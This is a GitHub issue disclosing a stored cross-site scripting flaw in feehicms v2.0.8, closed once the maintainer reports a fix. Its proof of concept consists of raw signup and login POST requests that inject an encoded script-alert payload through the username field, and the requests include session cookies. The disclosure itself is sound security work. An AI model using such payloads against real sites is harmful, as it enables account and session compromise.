Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

XSS vulnerability in feehicms v2.0.8 #43

Closed
LinnC1 opened this issue Nov 1, 2019 · 1 comment
Closed

XSS vulnerability in feehicms v2.0.8 #43

LinnC1 opened this issue Nov 1, 2019 · 1 comment

Comments

@LinnC1
Copy link

LinnC1 commented Nov 1, 2019

This is a Cross Site Scripting vulnerability. When the user name is <script>alert(1)<script> or js code, the pop-up alert will be triggered when browsing the post. Details are as follows:

POC example:

registered:

POST /index.php?r=site%2Fsignup HTTP/1.1
Host: demo.cms.feehi.com
Content-Length: 283
Cache-Control: max-age=0
Origin: http://demo.cms.feehi.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://demo.cms.feehi.com/index.php?r=site%2Fsignup
Accept-Encoding: gzip, deflate
Accept-Language: zh-HK,zh-CN;q=0.9,zh;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: Hm_lvt_5c8dd664b2122c4e33710bc08309c5e9=1572536291; Hm_lvt_949aa9449254cd665295a150d530d9c1=1572536091,1572583297; Hm_lpvt_949aa9449254cd665295a150d530d9c1=1572583297; _csrf_backend=587536836a78f5b1b93c7e038d97a0a6af03f097ff9cc90b328fe261e1541b74a%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22B3bX5mvAJKkAKwrO2ZxHinLa343w9ogL%22%3B%7D; Hm_lvt_faacd6412dc0ae220c883834f9c896eb=1572536077,1572582746,1572600883,1572600906; BACKEND_FEEHICMS=km3devogu3n3qvlsenfne27eec; _csrf=b19e3b1d941ce5196dd37924e05ac94fe2ace87f75a732fe96ce4d102789e664a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%221hgfXZdTQZmZKNxHE4MuEXGWHd2_uDtF%22%3B%7D; PHPSESSID=u69rgiksidqnl78r4n9g45frfn; Hm_lpvt_faacd6412dc0ae220c883834f9c896eb=1572601317
Connection: close

_csrf=gTY-NUvHDzoCLFGO7L9d7f4Mtqn3QkRnFFv0yq8jpF6wXllTE51rblN2PNSn8SWluzj73LIaAzBcP8aV2mfQGA%3D%3D&SignupForm%5Busername%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&SignupForm%5Bemail%5D=12345678%40qq.com&SignupForm%5Bpassword%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&signup-button=

login:

POST /index.php?r=site%2Flogin HTTP/1.1
Host: demo.cms.feehi.com
Content-Length: 296
Cache-Control: max-age=0
Origin: http://demo.cms.feehi.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://demo.cms.feehi.com/index.php?r=site%2Flogin
Accept-Encoding: gzip, deflate
Accept-Language: zh-HK,zh-CN;q=0.9,zh;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: Hm_lvt_5c8dd664b2122c4e33710bc08309c5e9=1572536291; Hm_lvt_949aa9449254cd665295a150d530d9c1=1572536091,1572583297; Hm_lpvt_949aa9449254cd665295a150d530d9c1=1572583297; _csrf_backend=587536836a78f5b1b93c7e038d97a0a6af03f097ff9cc90b328fe261e1541b74a%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22B3bX5mvAJKkAKwrO2ZxHinLa343w9ogL%22%3B%7D; Hm_lvt_faacd6412dc0ae220c883834f9c896eb=1572536077,1572582746,1572600883,1572600906; BACKEND_FEEHICMS=km3devogu3n3qvlsenfne27eec; _csrf=b19e3b1d941ce5196dd37924e05ac94fe2ace87f75a732fe96ce4d102789e664a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%221hgfXZdTQZmZKNxHE4MuEXGWHd2_uDtF%22%3B%7D; PHPSESSID=u69rgiksidqnl78r4n9g45frfn; Hm_lpvt_faacd6412dc0ae220c883834f9c896eb=1572601432
Connection: close

_csrf=DNiLSKN3vY4TpWeADWU7igas1i5rCbMJ-ewQrKYUQJg9sOwu-y3Z2kL_CtpGK0PCQ5ibWy5R9F6xiCLz01A03g%3D%3D&LoginForm%5Busername%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&LoginForm%5Bpassword%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&LoginForm%5BrememberMe%5D=0&LoginForm%5BrememberMe%5D=1&login-button=

registered:
1 1

login:
1 2

View post:
1 3
1 4

How to fix: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

@LinnC1 LinnC1 changed the title XSS vulnerability in feihicms v2.0.8 XSS vulnerability in feehicms v2.0.8 Nov 1, 2019
Repository owner deleted a comment from wfee Nov 3, 2019
@liufee
Copy link
Owner

liufee commented Nov 3, 2019

fix username xss vulnerability
tnx

@liufee liufee closed this as completed Nov 3, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants